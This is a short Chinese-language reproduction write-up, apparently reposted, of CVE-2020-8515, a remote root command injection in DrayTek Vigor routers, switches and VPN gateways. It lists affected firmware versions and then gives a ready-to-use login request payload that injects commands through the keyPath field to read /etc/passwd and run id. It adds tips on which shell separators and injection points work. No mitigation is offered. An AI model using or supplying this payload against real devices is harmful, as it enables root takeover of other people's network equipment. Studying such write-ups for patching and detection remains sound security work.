一、漏洞描述

DrayTek URI未能正确处理SHELL字符，远程攻击者可以利用该漏洞提交特殊的请求，可以ROOT权限执行任意命令。

远程命令注入漏洞被标记为CVE-2020-8515，主要影响了DrayTek Vigor网络设备，包括企业交换机、路由器、负载均衡器和VPN网关。

[出自:jiwo.org]

二、影响范围

Vigor2960 < v1.5.1

Vigor300B < v1.5.1

Vigor3900 < v1.5.1

VigorSwitch20P2121 <= v2.3.2

VigorSwitch20G1280 <= v2.3.2

VigorSwitch20P1280 <= v2.3.2

VigorSwitch20G2280 <= v2.3.2

VigorSwitch20P2280 <= v2.3.2

三、漏洞复现

登录界面登录burp抓包：

抓取登录数据包添加keypath的payload的字段

payload：

action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2f/etc/passwd%26id%26pwd&loginUser=a&loginPwd=a

在这个基础上继续研究了本漏洞支持其他可以执行的命令：

action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2f/etc/passwd%26id%26pwd&loginUser=a&loginPwd=a

shell方面，因为输入的命令是由mainfunction.cgi解析的，所以空格会被替换为“+”（存在一些困难）。

注入点涉及keyPath和rtick，和/www/cgi-bin/mainfunction.cgi文件有关，对应的web服务程序为/usr/sbin/lighttpd

主要是&符号的执行，可以进行拼接，但是｜、;就不行

参考链接：https://mp.weixin.qq.com/s/exz2utSbA_-YXM5htd4lxA